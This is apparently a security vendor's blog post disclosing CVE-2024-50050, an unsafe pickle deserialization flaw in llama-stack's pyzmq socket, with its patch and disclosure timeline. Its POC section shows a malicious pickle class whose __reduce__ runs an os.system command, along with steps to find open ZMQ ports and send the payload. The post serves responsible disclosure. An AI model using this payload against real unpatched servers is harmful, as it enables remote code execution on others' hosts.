Overview

CVE-2024-50050: Critical Vulnerability in meta-llama/llama-stack by Meta

Recently, the Oligo Research team has been carefully looking at open-source Artificial Intelligence (AI) frameworks to ensure the security of these tools that enterprises are leveraging more and more. Through our analysis, we have noticed a common thread among several of these frameworks: they leverage an open-source library (pyzmq) in an unsafe way, which enables arbitrary code execution for attackers.

To shed light on this foundational issue, this blog is Part 1 of a series of vulnerabilities that Oligo has uncovered related to the misuse of the pyzmq open-source library. More to come, but please read on to learn about CVE-2024-50050, a critical vulnerability in the GenAI open-source framework, meta-llama, which could enable arbitrary code execution on servers, leading to things like resource theft, data breaches, and even control over hosted AI models.

TL;DR on CVE-2024-50050

The Oligo research team has discovered a critical vulnerability in meta-llama, an open source framework from Meta for building and deploying GenAI applications. The vulnerability, CVE-2024-50050 enables attackers to execute arbitrary code on the llama-stack inference server from the network.

Snyk provided this vulnerability with a CVSS score of 9.3 (critical) in CVSS version 4.0 and 9.8 (critical) in CVSS version 3.1. While the vulnerability is still pending analysis through NVD, it received a CVSS score of 6.3 (medium) from Meta, who issued it following our report.

The high CVSS score is due to the nature of the vulnerability. Affected versions of meta-llama are vulnerable to deserialization of untrusted data, meaning that an attacker can execute arbitrary code by sending malicious data that is deserialized. 

The vulnerability was quickly patched by Meta’s security teams, and it is critical that all users upgrade to version 0.0.41 or higher. 

Llama Stack

Llama Stack is an open-source framework developed by Meta to streamline the development and deployment of GenAI applications, particularly those using Meta's Llama models. It aims to accelerate innovation in the AI space by providing a consistent set of building blocks that span the entire development lifecycle, from model training to production deployment.

The Llama Stack framework combines interconnected APIs and tools that seamlessly enable users and partners to develop, deploy, and optimize GenAI applications. By integrating capabilities like inference, safety, memory management, and evaluation, it provides a cohesive ecosystem for building powerful and adaptable AI solutions.

Llama-stack was introduced by Meta in July 2024 to support the Llama family of models. It is backed by the biggest partners in the AI ecosystem such as AWS, Groq, NVIDIA, Ollama, TogetherAI, Dell and more.


Llama Stack has gained significant traction in the AI development community, with several major tech companies and cloud providers offering support for its APIs. Some notable partners include AWS Bedrock, Fireworks.ai, Together AI, TensorRT Inference (TGI) and more. These integrations are not the default, and are unaffected by the vulnerability, which is rooted in the default inference implementation (“Meta Reference”).


Finding The Vulnerability

Our research team has run across llama-stack, and it has been gaining some traction all over - it became the official way to use Meta’s Llama models. It offers a variety of integrations using a single API specification. For example, products such as vLLM or AWS Bedrock can handle the Inference part of your application pipeline (bring your own implementation).

meta-llama had only 200 stars when we discovered the vulnerability and has since catapulted to nearly 6,000 in just a few months. 

3 months later, meta-llama has more than 5000 stars!

We have identified a code execution vulnerability that affects hosts running llama-stack. The vulnerability affects the default meta reference python Inference API implementation in the run_inference method:

The vulnerable method in llama-stack

This method leverages recv_pyobj to receive serialized Python objects, which are automatically deserialized using Python’s pickle module. However, pickle is inherently insecure when used with untrusted data, as it can execute arbitrary code during the deserialization process. In scenarios where the ZeroMQ socket is exposed over the network, attackers could exploit this vulnerability by sending crafted malicious objects to the socket. Since recv_pyobj will unpickle these objects, an attacker could achieve arbitrary code execution (RCE) on the host machine. 

Beside the main API of llama-stack, we noticed another TCP server is used for inter-process communication. And it is leveraging a robust messaging library called Zero-MQ.

The pyzmq dependency

Llama-stack uses pyzmq (ZeroMQ python implementation) for efficient communication and fast messaging. The method 'recv_pyobj' was added  to pyzmq approximately 8 years ago. The implementation of the function is only 2 lines:

    def recv_pyobj(self, flags: int = 0) -> Any:
        msg = self.recv(flags)
        return self._deserialize(msg, pickle.loads)

The python code above does the following:

  1. Receive pickled data from the socket
  2. Pass it to _deserialize along with pickle.loads for unpickling

_deserialize runs the deserialization method passed to it in the second parameter. In the case of recv_pyob, the _deserialize method will run the pickle.loads method.This means that data from an unverified source is unpickled making it unsafe and vulnerable by design. 

Unsafe use of Pickle have led to numerous remote code execution CVEs in recent years:
- https://www.cve.org/CVERecord?id=CVE-2022-34668
- https://www.vicarius.io/vsociety/posts/rce-in-python-nltk-cve-2024-39705-39706
- https://www.oligo.security/blog/tensorflow-keras-downgrade-attack-cve-2024-3660-bypass
There are also many more examples that we have presented at CNCF conferences from open-source documentations.

Using recv_pyobj can be risky

The maintainer of pyzmq agreed that this usage is indeed unsafe:

… shouldn’t be used except for trusted sources, just like pickle itself. The choice to run this on an open socket isn’t a choice pyzmq makes, but sounds like meta-llama made an unsafe choice! …

The meta reference implementation in python server uses pyzmq, specifically recv_pyobj() which accepts data from a network socket (that anyone could write to). This data is unpickled automatically using the unsafe method pickle.loads, which will deserialize ANY python object, including dangerous ones:

  1. https://github.com/meta-llama/llama-stack/blob/3c99f08267bca8eabaaa0b8092ca82c92291cf3f/llama_stack/providers/impls/meta_reference/inference/parallel_utils.py#L249
  2. https://github.com/meta-llama/llama-stack/blob/3c99f08267bca8eabaaa0b8092ca82c92291cf3f/llama_stack/providers/impls/meta_reference/inference/parallel_utils.py#L261

The pickle.loads method can be abused to achieve arbitrary code execution.

POC

The following will search for ZMQ open ports on the same host and it will write a malicious pickled object to the socket it finds open, using send_pyobj() method.

When the victim process calls recv_pyobj(), it executes the pickled code during deserialization, which leads to arbitrary code execution.

To exploit this vulnerability, it’s essential to understand how a pickle exploit works. To demonstrate, we created a simple class called RCE:

    class RCE:
   def __reduce__(self):
       import os
       cmd = 'touch /tmp/pickle_rce_created_this_file.txt && echo RCE'
       return os.system, (cmd,)

When pickle.loads deserializes an object, it looks for methods like __reduce__ or __reduce_ex__ on that object, which define how the object should be restored. If either of these methods is implemented, it allows the object to specify custom behavior for its deserialization. This flexibility, unfortunately, can be exploited because __reduce__ can include code that executes arbitrary commands when the object is unpickled.

With our payload ready, the next step is to identify open llama-stack ports. We can use the following command to check for listening Python processes:

lsof -iTCP -sTCP:LISTEN | grep -i python | awk '{print $9}'

Alternatively, we can use nmap to scan ports on remote hosts.

Once we have the payload and the zmq port, we can serialize our RCE class using pickle.dumps, send it to the zmq socket, and achieve remote code execution (RCE).

How Oligo detects the vulnerability

While SCA fails to identify shadow vulnerabilities like the one in llama-stack, real-time detection is essential for identifying and mitigating these threats at the moment they are exploited.

Oligo ADR addresses this gap by maintaining an extensive and constantly updated database of runtime profiles for numerous third-party libraries. The Oligo platform leverages these profiles to identify unusual library behavior, signaling the initiation or progression of an exploit.

For the llama-stack library, Oligo’s prebuilt profiles have never recorded legitimate instances of code execution within the Pickle processing flow. Consequently, Oligo swiftly flags any attempt to trigger injection exploits, automatically generating an incident report in the Oligo ADR platform, even in the absence of a CVE related to llama-stack.

The attack graph (Evidence) in the Oligo Platform after running the POC exploit on a demo cluster.
The ADR profile violation detection, based on the python call stack (fetched with eBPF)  and library level profile deviation (in red).

Responsible Disclosure - CVE-2024-50050 (CVSS Score 9.3)

We reported a security issue to Meta following responsible disclosure. Meta’s security team was cooperative and responsive, quickly responding to our report with contact details and guidelines on how to disclose vulnerabilities through a GitHub issue.

The patch was applied in version 0.0.41 (llama-stack>=0.0.41).

In the fix, the pickle serialization implementation (which enables a vast variety of python objects to be serialized) was replaced with an elegant type-safe Pydantic JSON implementation, across the API.

pyzmq also issued a fix, with a clear warning about the implications of using recv_pyobj with untrusted data  https://github.com/zeromq/pyzmq/commit/f4e9f17fe1c370edfe5c4b33b9594d1da907a87e

Responsible Disclosure Timeline

29 Sep, 2024 - Oligo reported the vulnerability to Meta

30 Sep, 2024 - Meta performed initial evaluation of the report.

1 Oct, 2024 - Meta was confirmed the relevant teams are working on a fix.

10 Oct, 2024 - Meta releases a fix on github and releases version 0.0.41 to PyPi.

24 Oct, 2024 - Meta issues CVE-2024-50050

Final Notes

Meta-llama is a robust framework for building generative AI applications. which we highly recommend. It sets a new standard for open source LLM frameworks, thanks to its rich end-to-end features, layered architecture, partner network and growing number of SDKs.

To avoid similar issues in the future, thanks to pyzmq’s amazing maintainers, the documentation was significantly improved around those methods. The examples of pyzmq are now using secure best-practices for transferring data between processes in a signed manner. Such work is deeply appreciated and is not taken for granted, and will help protect organizations.

Meta is a true pioneer of Open Source AI and is behind some of the best open source models to date - the Llama family of models - but even the largest companies are exposed to Shadow Vulnerabilities. In upcoming blog posts, we will highlight other vulnerabilities that have surfaced as a result of the misuse of pyzmq. Stay tuned! 

Subscribe and get the latest security updates

Zero in on what's exploitable

Oligo helps organizations focus on true exploitability, streamlining security processes without hindering developer productivity.